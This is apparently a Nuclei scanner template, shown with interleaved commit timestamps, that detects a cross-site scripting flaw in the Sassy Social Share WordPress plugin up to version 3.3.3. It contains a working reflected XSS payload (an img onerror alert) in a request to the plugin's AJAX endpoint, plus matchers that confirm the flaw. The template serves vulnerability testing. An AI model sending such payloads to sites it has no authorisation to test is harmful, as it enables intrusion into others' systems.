2020-10-22 20:38:55 +00:00
|
|
|
id: sassy-social-share-xss
|
2020-10-20 15:28:01 +00:00
|
|
|
|
|
|
|
info:
|
2022-03-18 14:22:29 +00:00
|
|
|
name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
|
2021-06-09 12:20:56 +00:00
|
|
|
author: Random_Robbie
|
2020-10-20 15:28:01 +00:00
|
|
|
severity: medium
|
2022-08-10 09:08:35 +00:00
|
|
|
description: |
|
|
|
|
AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
|
2022-08-06 16:54:58 +00:00
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: xss,wp,wpscan,wordpress,wp-plugin,sassy
|
2022-03-18 14:22:29 +00:00
|
|
|
|
2020-10-20 15:28:01 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]="
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-03-18 14:22:29 +00:00
|
|
|
part: body
|
2020-10-20 15:28:01 +00:00
|
|
|
words:
|
2021-07-14 15:25:05 +00:00
|
|
|
- '[{"<img src=x onerror=alert(document.domain)>":""}]'
|
|
|
|
- 'facebook'
|
|
|
|
- 'twitter'
|
2021-07-14 11:31:59 +00:00
|
|
|
condition: and
|
|
|
|
|
2022-03-18 14:22:29 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- 'application/json'
|
|
|
|
negative: true
|
|
|
|
|
2021-07-14 11:31:59 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
2022-08-10 09:08:35 +00:00
|
|
|
- 200
|